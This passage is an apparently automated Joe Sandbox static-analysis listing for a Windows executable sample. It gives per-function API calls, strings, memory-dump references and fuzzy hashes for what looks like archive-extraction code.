Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 627a8dd7258ccc4232459de77274335a0c6db546953123bf0dc9bbcafe2451bb
Instruction ID: 3c6dd2fb18e15f268605cc7ab62f18c19e7e922127cb9dae4d6d6f406de0b0af
Opcode Fuzzy Hash: 627a8dd7258ccc4232459de77274335a0c6db546953123bf0dc9bbcafe2451bb
Instruction Fuzzy Hash: ABA011CAAA8302FCB00822002C02C3B028CC0C2F2AB30882EF822880C0AA800C8808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f5a8886a0b1562f017e5bdcf0ff3f92225d7a3442186cb73360078e64752812
Instruction ID: d52381b2c1822cbdd24df6945c9216c9c5b7954029022744726e22b370b720fb
Opcode Fuzzy Hash: 7f5a8886a0b1562f017e5bdcf0ff3f92225d7a3442186cb73360078e64752812
Instruction Fuzzy Hash: D0A011CAAE8300FCB00822A02C02C3B028CC0E0B2AB32822EF820880C0AA800A0808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e15606a1a98bb1c516b3339d3acf90e1c81b4462ba110db74db58db790d8599
Instruction ID: 3c6dd2fb18e15f268605cc7ab62f18c19e7e922127cb9dae4d6d6f406de0b0af
Opcode Fuzzy Hash: 6e15606a1a98bb1c516b3339d3acf90e1c81b4462ba110db74db58db790d8599
Instruction Fuzzy Hash: ABA011CAAA8302FCB00822002C02C3B028CC0C2F2AB30882EF822880C0AA800C8808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: df8010c1ec7c2544e47e1c6008353b3f169bc90542ee61125d6e8087b30da290
Instruction ID: c241c4d8de0e6e44c6c781fe9391c0fa7b360ba2968713407dabf7e179c55637
Opcode Fuzzy Hash: df8010c1ec7c2544e47e1c6008353b3f169bc90542ee61125d6e8087b30da290
Instruction Fuzzy Hash: EEA011CAAA8302FCB00822A02C02C3B028CC0C0B2AB32882EF822880C0AA80080808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E580

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91644d24a7f6059de2d95d86a4aa0402c88aff483165464977d9c841b40c6690
Instruction ID: c241c4d8de0e6e44c6c781fe9391c0fa7b360ba2968713407dabf7e179c55637
Opcode Fuzzy Hash: 91644d24a7f6059de2d95d86a4aa0402c88aff483165464977d9c841b40c6690
Instruction Fuzzy Hash: EEA011CAAA8302FCB00822A02C02C3B028CC0C0B2AB32882EF822880C0AA80080808B0

Uniqueness

Uniqueness Score: -1.00%

Function 00129F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0012903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00129F0C

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 2e71d2521e951da22a51aeadb56b95e6b3935e1cd9f739c2b0986143480dd5f5
Instruction ID: c2cb27a4bd97e72ba435439fce26e4f7e14b6cee2574691444b8c77393998b3d
Opcode Fuzzy Hash: 2e71d2521e951da22a51aeadb56b95e6b3935e1cd9f739c2b0986143480dd5f5
Instruction Fuzzy Hash: 77A0113008020A8A8E002B30CA0800E3B20EB20BC230002A8A00ACF8E2CB22888B8A00

Uniqueness

Uniqueness Score: -1.00%

Function 0013AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0013AE72,C:\Users\user\Desktop,00000000,0016946A,00000006), ref: 0013AC08

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 0fd7e0462830821aa252c07d289acd4d2a5329ef176e6404da4e0b510daa82fd
Instruction ID: 2fe66c9370baa4e76baeb97703ba22dc390ce8b4b5162a1ce71e81208a0d8af0
Opcode Fuzzy Hash: 0fd7e0462830821aa252c07d289acd4d2a5329ef176e6404da4e0b510daa82fd
Instruction Fuzzy Hash: C4A01130200200CB82000B328F8AA0EBAAAAFA2B82F00C028A00088030CB30C8A0AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0013C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0013C2B1
EndDialog.USER32(?,00000006), ref: 0013C2C4
GetDlgItem.USER32(?,0000006C), ref: 0013C2E0
SetFocus.USER32(00000000), ref: 0013C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0013C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0013C358
FindFirstFileW.KERNEL32(?,?), ref: 0013C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0013C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0013C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0013C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013C3D4
_swprintf.LIBCMT ref: 0013C404

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0013C417
FindClose.KERNEL32(00000000), ref: 0013C41E
_swprintf.LIBCMT ref: 0013C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0013C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0013C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0013C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0013C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0013C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013C509
_swprintf.LIBCMT ref: 0013C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0013C548
_swprintf.LIBCMT ref: 0013C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0013C5AF

Part of subcall function 0013AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0013AF35
Part of subcall function 0013AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0015E72C,?,?), ref: 0013AF84

Strings

%s %s %s, xrefs: 0013C3F2, 0013C527
%s %s, xrefs: 0013C469, 0013C58E
REPLACEFILEDLG, xrefs: 0013C247

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: f58ed846d699bdd0a6fb54fe333daf65462c7b90ca16237a3e9346417b75c7cb
Instruction ID: 7af57965b71437231d5582bac88e686e045831e0a4e5e65fb655dcf894d42480
Opcode Fuzzy Hash: f58ed846d699bdd0a6fb54fe333daf65462c7b90ca16237a3e9346417b75c7cb
Instruction Fuzzy Hash: 2191A472248344BBE321DBA4DC89FFB77ECEB49B40F044819F649D6481D771A6448B62

Uniqueness

Uniqueness Score: -1.00%

Function 00126FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00126FAA
_wcslen.LIBCMT ref: 00127013
_wcslen.LIBCMT ref: 00127084

Part of subcall function 00127A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00127AAB
Part of subcall function 00127A9C: GetLastError.KERNEL32 ref: 00127AF1
Part of subcall function 00127A9C: CloseHandle.KERNEL32(?), ref: 00127B00

Part of subcall function 0012A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0012977F,?,?,001295CF,?,?,?,?,?,00152641,000000FF), ref: 0012A1F1
Part of subcall function 0012A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0012977F,?,?,001295CF,?,?,?,?,?,00152641), ref: 0012A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00127139
CloseHandle.KERNEL32(00000000), ref: 00127155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00127298

Part of subcall function 00129DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001273BC,?,?,?,00000000), ref: 00129DBC
Part of subcall function 00129DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00129E70

Part of subcall function 00129620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001295D6,?,?,?,?,?,00152641,000000FF), ref: 0012963B

Part of subcall function 0012A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A501
Part of subcall function 0012A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012A325,?,?,?,0012A175,?,00000001,00000000,?,?), ref: 0012A532

Strings

\??\, xrefs: 0012702B
SeRestorePrivilege, xrefs: 00126FC2
UNC\, xrefs: 00127051
SeCreateSymbolicLinkPrivilege, xrefs: 00126FCC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: c6a5fe4b1d783c319ad187530080284c98f52b419345de6b871a0653a3d6ef2d
Instruction ID: 48468ee67b9e6f1a2e72102add7681ba7ddea7b0101220e40a0e4269114dd304
Opcode Fuzzy Hash: c6a5fe4b1d783c319ad187530080284c98f52b419345de6b871a0653a3d6ef2d
Instruction Fuzzy Hash: 01C1C371904624AADB25DB74EC41FEFB3A8AF18300F04455AF95AE71C2D730AA688B61

Uniqueness

Uniqueness Score: -1.00%

Function 0014D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0014DA34

Strings

1#QNAN, xrefs: 0014EC3A
1#INF, xrefs: 0014EC41
1#SNAN, xrefs: 0014EC33
1#IND, xrefs: 0014EC2C

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 96647c12f152626f09ccfdb9d86a8cb357c99641ddbe1598eadfb3666b88aa02
Instruction ID: 46ef8abec07a4943e12b08ef4b0a8449d026467bf623487b2b8a81995f5090c2
Opcode Fuzzy Hash: 96647c12f152626f09ccfdb9d86a8cb357c99641ddbe1598eadfb3666b88aa02
Instruction Fuzzy Hash: 0BC21671E086288FDF29CE289D407AAB7F5FB44315F1541EAD84EE7290E775AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 001232F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00123300
_swprintf.LIBCMT ref: 001236C7

Strings

CMT, xrefs: 00123A17
h%u, xrefs: 001236BC
hc%u, xrefs: 0012370A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 11dba8490ef687a74a4a1184265ee8f37e13223d3328c426e53335826e3c0bd2
Instruction ID: 5b0eee86a9a79863793cefab32610a5b72e491cb084ef389247b325c671390c4
Opcode Fuzzy Hash: 11dba8490ef687a74a4a1184265ee8f37e13223d3328c426e53335826e3c0bd2
Instruction Fuzzy Hash: 12321871500394AFDF18DF74D895AEA3BE5AF25300F04047DFD9A8B282DB749A69CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0012286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00122874
_strlen.LIBCMT ref: 00122E3F

Part of subcall function 001302BA: __EH_prolog.LIBCMT ref: 001302BF

Part of subcall function 00131B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012BAE9,00000000,?,?,?,00010440), ref: 00131BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00122F91

Strings

CMT, xrefs: 00122FBC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: ba5cbd8281f5df0eb628d844769467a336e5ef6db4d57ea8b63660eee7ec111f
Instruction ID: fe4d75a2a9c022666e1e07d67c49acd379b360c47244382e97537b42ba63da28
Opcode Fuzzy Hash: ba5cbd8281f5df0eb628d844769467a336e5ef6db4d57ea8b63660eee7ec111f
Instruction Fuzzy Hash: 0F6237716002649FDF19CF38D8856EE3BA1EF64300F08457EFD9A8B282DB759965CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0013F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0013F844
IsDebuggerPresent.KERNEL32 ref: 0013F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0013F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0013F93A

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c3a634d5f9a2a7e8100003d7152db99c5890780a6e1b3b5afa123300a818a2b9
Instruction ID: 560dfca38605bbdc7b02464bd0d0679541486182a113bb546ea30925fc9e52cc
Opcode Fuzzy Hash: c3a634d5f9a2a7e8100003d7152db99c5890780a6e1b3b5afa123300a818a2b9
Instruction Fuzzy Hash: B2311475D0531DDBDB21DFA4D989BCCBBB8AF08304F1040AAE40CAB250EB719B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 0013E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0013E5E8,0000001C,0013E7DD,00000000,?,?,?,?,?,?,?,0013E5E8,00000004,00181CEC,0013E86D), ref: 0013E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0013E5E8,00000004,00181CEC,0013E86D), ref: 0013E6CF

Strings

D, xrefs: 0013E6C3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 0a225c3b726591daea73a52cbb8d7ff4860babaa3fa2c7cd99da37d70c71c202
Instruction ID: 5943ec5617fcdb47a053dccbe0c64ee6e516b0ca84436c21c5809e0cee33f7fe
Opcode Fuzzy Hash: 0a225c3b726591daea73a52cbb8d7ff4860babaa3fa2c7cd99da37d70c71c202
Instruction Fuzzy Hash: 5001F776A00209ABDF14DE29DC49BDD7BEAAFC4324F0CC120ED19DB190DB34DD458680

Uniqueness

Uniqueness Score: -1.00%

Function 00148EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00148FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00148FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00148FCC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
